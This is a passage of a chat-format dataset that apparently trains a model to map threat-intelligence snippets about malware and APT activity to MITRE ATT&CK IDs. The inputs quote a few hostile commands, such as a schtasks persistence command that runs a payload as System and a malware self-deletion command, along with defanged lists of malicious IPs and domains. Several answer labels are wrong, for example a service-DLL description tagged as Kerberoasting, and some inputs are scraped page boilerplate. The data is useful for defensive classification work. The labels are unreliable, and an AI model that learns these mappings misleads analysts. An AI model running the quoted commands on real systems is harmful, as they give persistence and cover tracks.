History" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike can track key presses with a keylogger module." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "checks if the victim OS is 32 or 64-bit." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BoxCaon has used Windows API calls to obtain information about the compromised host." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "dsquery can be used to gather information on permission groups within a domain." }, { "role": "assistant", "content": "T1069.002 - Permission Groups Discovery: Domain Groups" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BRONZE BUTLER has exploited Microsoft Office vulnerabilities CVE-2014-4114, CVE-2018-0802, and CVE-2018-0798 for execution." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TajMahal has the ability to index files from drives, user profiles, and removable drives." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BLINDINGCAN can search, read, write, move, and execute files." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MacMa can clear possible malware traces such as application logs." }, { "role": "assistant", "content": "T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Operation Wocao has obtained the password for the victim's password manager via a custom keylogger." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "[Screenshot 1] Encrypted Login Packet sent by Gh0stRAT infected PC In addition to a standard malware analysis blog post, I’d also like to take this time to document and describe my methods for analysis, in the hopes that you as a reader will use these techniques in the future" }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "mimics a legitimate Russian program called USB Disk Security." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "communicates using HTTPS and uses a custom encryption cipher to encrypt the HTTPS message body." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A service DLL (loaded by svchost.exe) with a ServiceMain function typically named NetSetupServiceMain - A standard non-Service DLL loaded by rundll32.exe" }, { "role": "assistant", "content": "T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses a custom encryption algorithm, which consists of XOR and a stream that is similar to the Blum Blum Shub algorithm." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bandook has been launched by starting iexplore.exe and replacing it with Bandook's payload." }, { "role": "assistant", "content": "T1055.012 - Process Injection: Process Hollowing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TEMP.Veles has used Mimikatz and a custom tool, SecHack, to harvest credentials." }, { "role": "assistant", "content": "T1003.001 - OS Credential Dumping: LSASS Memory" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Frankenstein, the threat actors used WMI queries to check if various security applications were running as well as to determine the operating system version." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "may enumerate user directories on a victim." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PLEAD has used HTTP for communications with command and control (C2) servers." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "stores a configuration files in the startup directory to automatically execute commands in order to persist across reboots." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CTU researchers assess with high confidence that IRON RITUAL's intent is long term, covert access to networks of interest for the purposes of espionage and data theft.ToolsTaegis™ XDR Adversary Software Coverage Tool" }, { "role": "assistant", "content": "T1195.002 - Compromise Software Supply Chain" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0" }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing', 'T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PUNCHBUGGY has hashed most its code's functions and encrypted payloads with base64 and XOR." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This task is executed every 25 minutes and will repeat the actions described above – recreating the JavaScript code which later will create and execute a PowerShell script (described below)" }, { "role": "assistant", "content": "T1064 - Scripting', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "All this data is merged in one file xmlrwbin.inc, which is then encrypted with RC4. To be able to decipher the data, the attacker should certainly know either the MD5 hash or the whole buffer content. This data is also sent, but RSA encrypted. The malware constructs a 1120 bit public key, uses it to encrypt the 117-bytes buffer. The malware then concatenates all the data to be sent as a 128-bytes block. The resulting data is saved in C:Program FilesCommon FilesSystemOle DB to a file named according to the following format" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BBK has the ability to inject shellcode into svchost.exe." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Grandoreiro can identify installed security tools based on window names." }, { "role": "assistant", "content": "T1010 - Application Window Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "InvisiMole can use a modified base32 encoding to encode data within the subdomain of C2 requests." }, { "role": "assistant", "content": "T1132.002 - Non-Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT34 has used brute force techniques to obtain credentials." }, { "role": "assistant", "content": "T1110 - Brute Force" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Even when we observed LuckyMouse using weaponized documents with CVE-2017-11882 (Microsoft Office Equation Editor, widely used by Chinese-speaking actors since December 2017), we can´t prove they were related to this particular attack" }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The implant receives HTTP-based commands from a control server and parses the HTTP Content-Type and Content-Length from the HTTP header. If the HTTP Content-Type matches the following value, then the implant executes the command specified by the control server" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Next, it checks the running processes against a list of hard-coded process names; if any are found, the machine is forcefully rebooted. The names are linked to various tools used by malware researchers" }, { "role": "assistant", "content": "T1057 - Process Discovery', 'T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This final cluster appears to serve as the C2 infrastructure for a custom remote administration tool called Pteranodon. Gamaredon has used, maintained and updated development of this code for years. Its code contains anti-detection functions specifically designed to identify sandbox environments in order to thwart antivirus detection attempts" }, { "role": "assistant", "content": "T1497 - Virtualization/Sandbox Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GALLIUM has used PsExec to move laterally between hosts in the target network." }, { "role": "assistant", "content": "T1570 - Lateral Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Wizard Spider has used stolen credentials to copy tools into the \"%TEMP%\" directory of domain controllers." }, { "role": "assistant", "content": "T1570 - Lateral Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ragnar Locker has attempted to stop services associated with business applications and databases to release the lock on files used by these applications so they may be encrypted." }, { "role": "assistant", "content": "T1489 - Service Stop" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PowerDuke uses rundll32.exe to load." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In older versions, Valak downloads the second stage JS and uses only one obfuscation technique: Base64. The newer versions use XOR in addition to Base64" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT30 has relied on users to execute malicious file attachments delivered via spearphishing emails." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UnionCryptoUpdater.exe does not immediately download the stage 2 malware but instead downloads it after a time specified by the C2 server. This delay could be implemented to prevent researchers from directly obtaining the stage 2 malware" }, { "role": "assistant", "content": "T1497.003 - Time Based Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The functional payload is a DLL compiled on 2019-03-11 02:23:54, which has two functionalities depending if the binary has a command line argument -daemon or -worker passed to it. The daemon functionality handles the C2 communications portion of the Trojan, which is configured to communicate with 185.12.45[.]134 over HTTPS using the following URL" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stuxnet enumerates the directories of a network resource." }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Similar to Reaver as posted by Palo Alto, it gets the IP or domain of the C&C server, the port, name of the binary, a sleep timer, and what Palo Alto calls a “campaign identifier.” Technical Details At this moment, we were unable to retrieve the original infection vector and other information regarding what other tools the APT15 group is using to attack their targets" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Summary . The following knowledgebase will explain the uses of Net commands in Windows Operating Systems. More information . Net Commands On Windows Operating Systems . The following Net Commands can be used to perform operations on Groups, users, account policies, shares, and so on. NET . The \"Net Accounts\" command is used to set the policy settings on local computer, such as Account policies and password policies. This command can't be used on domain controller. When you type Net Accounts, you will see the default settings of the Account Lockout policy and Password Policy in local computer show as: The above settings displayed as per the role of the computer. Community Solutions Content Disclaimer . Microsoft corporation and/or its respective suppliers make no representations about the suitability, reliability, or accuracy of the information and related graphics contained herein. User Account Control and remote restrictions - Windows Server Describes User Account Control (UAC) and remote restrictions in Windows Vista. auditpol get Reference article for the auditpol get command, which retrieves the system policy, per-user policy, auditing options, and audit security descriptor object. wevtutil Reference article for wevtutil, which lets you retrieve information about event logs and publishers. Manage cookies - Previous Version Docs - Blog - Contribute - Privacy & Cookies - Terms of Use - Trademarks - © Microsoft 2022 - Summary - More information - - - - Manage cookies - Previous Version Docs - Blog - Contribute - Privacy & Cookies - Terms of Use - Trademarks - © Microsoft 2022" }, { "role": "assistant", "content": "T1087.002 - Account Discovery: Domain Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "REvil can launch an instance of itself with administrative rights using runas." }, { "role": "assistant", "content": "T1134.002 - Create Process with Token" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Even more, this tiny bootkit with a size of only 80 kb on disk after installation can disable built-in Windows security protection such as Hypervisor-Protected Code Integrity (HVCI) and Windows Defender and bypass User Account Control (UAC)." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "InvisiMole can check for artifacts of VirtualBox, Virtual PC and VMware environment, and terminate itself if they are detected." }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Malicious obfuscated VBA code is executed when the macro is first enabled. In some cases, the malicious macro is also executed when the user activates a fake text box" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "IceApple .NET assemblies have used `App_Web_` in their file names to appear legitimate." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In the cases where Sakula does not use a registry key for persistence, it attempts to set itself up as a service (see Table 2). It invokes itself by calling WinExec with the \"net start %s\" argument (without quotes), where \"%s\" is the service name" }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BRONZE BUTLER has used various tools (such as Mimikatz and WCE) to perform credential dumping." }, { "role": "assistant", "content": "T1003.001 - OS Credential Dumping: LSASS Memory" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Based on our analysis, financial organizations in Turkey were targeted via spear phishing emails containing a malicious Microsoft Word document" }, { "role": "assistant", "content": "T1598.002 - Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can steal clipboard contents." }, { "role": "assistant", "content": "T1115 - Clipboard Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Another interesting discovery was a tool that was used during attacks to make queries to Active Directory using LDAP. This tool is able to dump detailed information about computers and usernames listed in Active Directory, and is tailored for a specific victim’s domain" }, { "role": "assistant", "content": "T1018 - Remote System Discovery', 'T1087.002 - Account Discovery: Domain Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "On October 31, TA505 sent two campaigns, both using .lnk files embedded in Microsoft Word documents. As shown in Figure 4, recipients must open the attached Word document, enable editing, and then execute the .lnk file by double clicking an image in the document. They must further confirm that they want to open the .lnk file (Figure 5), which, in turn, downloads an intermediate downloader. Despite the number of steps involved, TA505 relies on light social engineering in the email and lure as well as end user conditioning to proceed through the scheme and infect their PC with malware" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bazar has used XOR, RSA2, and RC4 encrypted files." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZxShell can capture screenshots." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Fine-tuning DaserfOur analyses revealed Daserf regularly undergo technical improvements to keep itself under the radar against traditional anti-virus (AV) detection. Daserf 1.72 and later versions use the alternative base64+RC4 to encrypt the feedback data, while others use different encryption such as 1.50Z, which uses the Ceasar cipher (which substitutes letters in plaintext with another that corresponds to a number of letters, either upwards or downwards" }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing', 'T1027.005 - Indicator Removal from Tools', 'T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UNC2452 obtained information about the configured Exchange virtual directory using \"Get-WebServicesVirtualDirectory\"." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pandora has the ability to gain system privileges through Windows services." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "added newly created accounts to the administrators group to maintain elevated access." }, { "role": "assistant", "content": "T1098 - Account Manipulation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 can create new users through Azure AD." }, { "role": "assistant", "content": "T1136.003 - Create Account: Cloud Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WhisperGate can enumerate connected remote logical drives." }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the capability to delete local files." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Amadey has decoded antivirus name strings." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POORAIM has used AOL Instant Messenger for C2." }, { "role": "assistant", "content": "T1102.002 - Bidirectional Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can download remote files." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BADCALL communicates on ports 443 and 8000 with a FakeTLS method." }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware component, test.exe, uses the Windows command \"cmd.exe\" /C whoami” to verify it is running with the elevated privileges of “System” and creates persistence by creating the following scheduled task:     schtasks /create /tn \"mysc\" /tr C:\\Users\\Public\\test.exe /sc ONLOGON     /ru \"System\" When executed, the malware first establishes a SOCKS5 connection to 192.157.198.103 using TCP port 1913" }, { "role": "assistant", "content": "T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FrameworkPOS can use DNS tunneling for exfiltration of credit card data." }, { "role": "assistant", "content": "T1048 - Exfiltration Over Alternative Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Clambling has the ability to capture and store clipboard data." }, { "role": "assistant", "content": "T1115 - Clipboard Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When it first starts, BADNEWS crawls the victim's mapped drives and collects documents with the following extensions: .doc, .docx, .pdf, .ppt, .pptx, and .txt." }, { "role": "assistant", "content": "T1039 - Data from Network Shared Drive" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "tfvn[.]com[.]vnshirkeswitch[.]netguideofgeorgia[.]orggulfclouds[.]sitejhssourcingltd[.]comkamagra4uk[.]compioneerfitting[.]compositronicsindia[.]comscseguros[.]ptspldernet[.]comtoshioco[.]comwww[.]happytohelpyou[.]inIP addressesThe following IP addresses have been observed to be associated with malware campaigns.112.213.89[.]4067.23.254[.]6162.212.33[.]98153.92.5[.]124185.117.22[.]19723.94.188[.]24667.23.254[.]17072.52.150[.]218148.66.136[.]62107.180.24[.]253108.179.246[.]13818.221.35[.]21494.46.15[.]20066.23.237[.]18672.52.150[.]218URLs:The following URLs have been observed to be associated with malware campaigns.https[:]//a[.]pomf[.]cat/http[:]//pomf[.]cat/upload[.]php" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "payloads are obfuscated prior to compilation to inhibit analysis and/or reverse engineering." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bazar can execute a PowerShell script received from C2." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "First, the sample is UPX packed" }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PLEAD can use `ShellExecute` to execute applications." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 used the \"netstat -anpo tcp\" command to display TCP connections on the victim's machine." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "To get a job from the Google Drive account, the Trojan starts by creating a string that has the following structure with each element within the subdomain subjected to the number to character substitution from Table 4: cc. The Trojan will then obtain an OAUTH access token to the Google Drive in the same manner as before when obtaining the unique identifier" }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Nefilim removes itself from the target systems after infection with the following code: del C:\\Users\\admin\\AppData\\Local\\Temp\\.exe\" /s /f /q\"" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has created new services to establish persistence." }, { "role": "assistant", "content": "T1543.003 - Create or 